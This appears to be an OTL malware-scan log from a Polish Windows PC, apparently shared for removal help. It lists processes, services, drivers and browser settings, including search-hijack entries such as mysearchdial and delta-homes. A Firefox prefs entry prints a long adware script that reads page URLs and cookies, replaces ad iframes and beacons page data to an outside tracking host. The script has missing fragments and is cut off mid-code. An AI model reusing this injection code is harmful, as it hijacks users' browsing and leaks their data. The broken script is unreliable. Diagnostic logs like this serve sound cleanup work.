OTL logfile created on: 2014-10-30 21:56:46 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Admin\Downloads 64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation Internet Explorer (Version = 9.11.9600.17358) Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd 3,90 Gb Total Physical Memory | 1,64 Gb Available Physical Memory | 41,94% Memory free 7,81 Gb Paging File | 5,27 Gb Available in Paging File | 67,48% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86) Drive C: | 195,21 Gb Total Space | 78,87 Gb Free Space | 40,40% Space Free | Partition Type: NTFS Drive D: | 736,20 Gb Total Space | 544,42 Gb Free Space | 73,95% Space Free | Partition Type: NTFS Drive G: | 6,42 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: CDFS Computer Name: ADMIN-KOMPUTER | User Name: Admin | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2014-10-30 21:49:52 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Admin\Downloads\OTL.exe PRC - [2014-10-30 12:11:40 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe PRC - [2014-09-24 19:30:54 | 004,023,360 | ---- | M] (GG Network S.A.) -- C:\Users\Admin\AppData\Local\GG\Application\gghub.exe PRC - [2014-09-24 19:30:53 | 000,132,672 | ---- | M] (GG Network S.A.) -- C:\Users\Admin\AppData\Local\GG\Application\ggapp.exe PRC - [2014-09-23 12:54:48 | 008,935,513 | ---- | M] () -- C:\Program Files (x86)\Dtella@MS\dtella.exe PRC - [2014-09-12 10:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe PRC - [2014-09-11 16:02:25 | 001,870,000 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_152.exe PRC - [2014-02-26 16:43:10 | 000,425,104 | ---- | M] (Taiwan Shui Mu Chih Ching Technology Limited.) -- C:\Program Files (x86)\WinZipper\winzipersvc.exe PRC - [2013-09-18 15:47:33 | 000,295,512 | ---- | M] (RealNetworks, Inc.) -- C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe PRC - [2013-08-14 14:19:22 | 000,039,056 | ---- | M] () -- C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe PRC - [2012-05-21 08:26:28 | 000,291,648 | R--- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe PRC - [2012-02-29 02:20:04 | 000,363,800 | R--- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe PRC - [2012-02-29 02:19:58 | 000,277,784 | R--- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe PRC - [2012-02-29 02:19:48 | 000,161,560 | R--- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [color=#E56717]========== Modules (No Company Name) ==========[/color] MOD - [2014-10-30 12:11:40 | 003,649,648 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll MOD - [2014-09-24 19:30:55 | 003,205,184 | ---- | M] () -- C:\Users\Admin\AppData\Local\GG\Application\xulrunner\mozjs.dll MOD - [2014-09-23 12:54:48 | 008,935,513 | ---- | M] () -- C:\Program Files (x86)\Dtella@MS\dtella.exe MOD - [2014-09-11 16:02:25 | 016,825,520 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll [color=#E56717]========== Services (SafeList) ==========[/color] SRV:[b]64bit:[/b] - [2014-10-29 00:46:42 | 001,436,424 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe -- (FLEXnet Licensing Service 64) SRV:[b]64bit:[/b] - [2014-09-19 02:25:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService) SRV:[b]64bit:[/b] - [2013-10-14 10:07:23 | 000,361,552 | ---- | M] (ArtistScope Pty Ltd) [Auto | Running] -- C:\Program Files\Common Files\ArtistScope\CSHelper64.exe -- (CSHelper) SRV:[b]64bit:[/b] - [2013-05-27 06:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV:[b]64bit:[/b] - [2012-02-02 21:29:52 | 000,628,448 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R) SRV:[b]64bit:[/b] - [2009-07-14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt) SRV:[b]64bit:[/b] - [2009-07-14 02:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rundll32.exe -- (fc67e7a0) SRV - [2014-10-30 12:11:40 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance) SRV - [2014-09-24 20:13:31 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc) SRV - [2014-09-12 10:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice) SRV - [2014-03-20 23:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32) SRV - [2014-02-26 16:43:10 | 000,425,104 | ---- | M] (Taiwan Shui Mu Chih Ching Technology Limited.) [Auto | Running] -- C:\Program Files (x86)\WinZipper\winzipersvc.exe -- (winzipersvc) SRV - [2013-09-11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32) SRV - [2013-08-14 14:19:22 | 000,039,056 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe -- (RealNetworks Downloader Resolver Service) SRV - [2012-03-02 22:48:56 | 000,276,248 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs) SRV - [2012-02-29 02:20:04 | 000,363,800 | R--- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS) SRV - [2012-02-29 02:19:58 | 000,277,784 | R--- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS) SRV - [2012-02-29 02:19:48 | 000,161,560 | R--- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe -- (jhi_service) SRV - [2012-01-12 09:07:32 | 000,695,640 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\McAfeeScanAndRepair\McAfeeScanRepairSvc.exe -- (McAfee ScanAndRepair Svc) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV:[b]64bit:[/b] - [2013-10-14 10:07:23 | 000,061,424 | ---- | M] () [Kernel | System | Running] -- C:\Program Files\Common Files\ArtistScope\CSDriver64.sys -- (CSDriver) DRV:[b]64bit:[/b] - [2013-09-13 23:04:36 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01) DRV:[b]64bit:[/b] - [2013-09-10 17:50:07 | 000,039,008 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\LhdX64.sys -- (LHDmgr) DRV:[b]64bit:[/b] - [2013-09-10 17:50:07 | 000,030,816 | ---- | M] (Lenovo Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AcpiVpc.sys -- (ACPIVPC) DRV:[b]64bit:[/b] - [2012-11-06 08:04:26 | 000,030,056 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\nvpciflt.sys -- (nvpciflt) DRV:[b]64bit:[/b] - [2012-05-31 10:06:50 | 002,811,904 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr) DRV:[b]64bit:[/b] - [2012-05-21 08:25:32 | 000,789,824 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc) DRV:[b]64bit:[/b] - [2012-05-21 08:25:32 | 000,357,184 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub) DRV:[b]64bit:[/b] - [2012-05-21 08:25:32 | 000,019,264 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iusb3hcs.sys -- (iusb3hcs) DRV:[b]64bit:[/b] - [2012-03-02 11:50:24 | 000,099,440 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C60x64.sys -- (L1C) DRV:[b]64bit:[/b] - [2012-03-01 07:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec) DRV:[b]64bit:[/b] - [2012-02-17 18:28:56 | 014,692,896 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx) DRV:[b]64bit:[/b] - [2011-11-15 11:24:20 | 000,313,960 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsUVStor.sys -- (RSUSBVSTOR) DRV:[b]64bit:[/b] - [2011-11-10 10:04:14 | 000,060,184 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64) DRV:[b]64bit:[/b] - [2011-03-30 01:21:48 | 000,038,424 | ---- | M] (Google Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ghsandroid.sys -- (ghsandroid) DRV:[b]64bit:[/b] - [2011-03-11 07:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata) DRV:[b]64bit:[/b] - [2011-03-11 07:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata) DRV:[b]64bit:[/b] - [2010-11-21 04:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt) DRV:[b]64bit:[/b] - [2010-11-21 04:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc) DRV:[b]64bit:[/b] - [2010-11-21 04:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD) DRV:[b]64bit:[/b] - [2010-11-21 04:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD) DRV:[b]64bit:[/b] - [2009-07-14 02:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs) DRV:[b]64bit:[/b] - [2009-07-14 02:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2) DRV:[b]64bit:[/b] - [2009-07-14 02:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor) DRV:[b]64bit:[/b] - [2009-06-10 21:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv) DRV:[b]64bit:[/b] - [2009-06-10 21:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv) DRV:[b]64bit:[/b] - [2009-06-10 21:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a) DRV:[b]64bit:[/b] - [2009-06-10 21:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir) DRV - [2010-06-25 11:07:14 | 000,035,088 | ---- | M] (CACE Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\npf.sys -- (NPF) DRV - [2009-07-14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.awesomehp.com/web/?type=ds&ts=1391856833&from=exp&uid=ST1000LM024XHN-M101MBB_S2U5J9FD416834&q={searchTerms} IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=181&d=20140924 IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd103&cd=2XzuyEtN2Y1L1QzutByE0F0DyDtBzy0EtD0BzzyBzy0DtDyDtN0D0Tzu0CyCyCyEtN1L2XzutBtFtBtFyDtFtCtDyBtDtN1L1Czu1L1C1H1B1QtCtDtA&cr=824961340&ir= IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{75B1EA5E-B09C-B960-322E-21187775557D}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.awesomehp.com/web/?type=ds&ts=1391856833&from=exp&uid=ST1000LM024XHN-M101MBB_S2U5J9FD416834&q={searchTerms} IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=181&d=20140924 IE - HKLM\..\URLSearchHook: - No CLSID value found IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE - HKLM\..\SearchScopes\{016DC87C-94D1-045D-B108-53564C412C2B}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd103&cd=2XzuyEtN2Y1L1QzutByE0F0DyDtBzy0EtD0BzzyBzy0DtDyDtN0D0Tzu0CyCyCyEtN1L2XzutBtFtBtFyDtFtCtDyBtDtN1L1Czu1L1C1H1B1QtCtDtA&cr=824961340&ir= IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.delta-homes.com/web/?utm_source=b&utm_medium=wpm0226&utm_campaign=installer&utm_content=ds&from=wpm0226&uid=ST1000LM024XHN-M101MBB_S2U5J9FD416834&ts=1393429378&type=default&q={searchTerms} IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=181&d=20140924 IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\..\SearchScopes,DefaultScope = {75B1EA5E-B09C-B960-322E-21187775557D} IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd103&cd=2XzuyEtN2Y1L1QzutByE0F0DyDtBzy0EtD0BzzyBzy0DtDyDtN0D0Tzu0CyCyCyEtN1L2XzutBtFtBtFyDtFtCtDyBtDtN1L1Czu1L1C1H1B1QtCtDtA&cr=824961340&ir= IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\..\SearchScopes\{75B1EA5E-B09C-B960-322E-21187775557D}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02 IE - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.order.1: "Mysearchdial" FF - prefs.js..browser.startup.homepage: "about:home" FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.0.2 FF - prefs.js..extensions.kZtcBTm1GIJ86QxA.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1){return}}catch(e){};(function(){var stngs = {attr_name:'s5392771597948072366',szy_domain:[\"directallapp.in\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13],[125,125,14],[234,60,15],[200,200,16],[336,280,17],[180,150,18],[120,60,19],[800,440,20],[800,600,21]],checkif:function(ifr){return (ifr.getAttribute('s5392771597948072366') || ifr.src.indexOf('=287609')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"20014\",eid:\"732\",hid:\"5392771597948072366\",lt:\"1\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"0v3Jm4DU\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);\nreturn a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if(c)for(var b=0,d=c.length;bf[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?\nadzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"<=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},\ndfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=5392771597948072366&eid=732&pid=20014&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src):\n((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=5392771597948072366&eid=732&pid=20014&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src),adzy653rk.ifrset(adzy653rk.ifr[b],adzy653rk.src[b][1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==\ntypeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+5)return c[b][2];return!1},getAds:function(a,c){if(-1\",\"\"];switch(c[1]){case 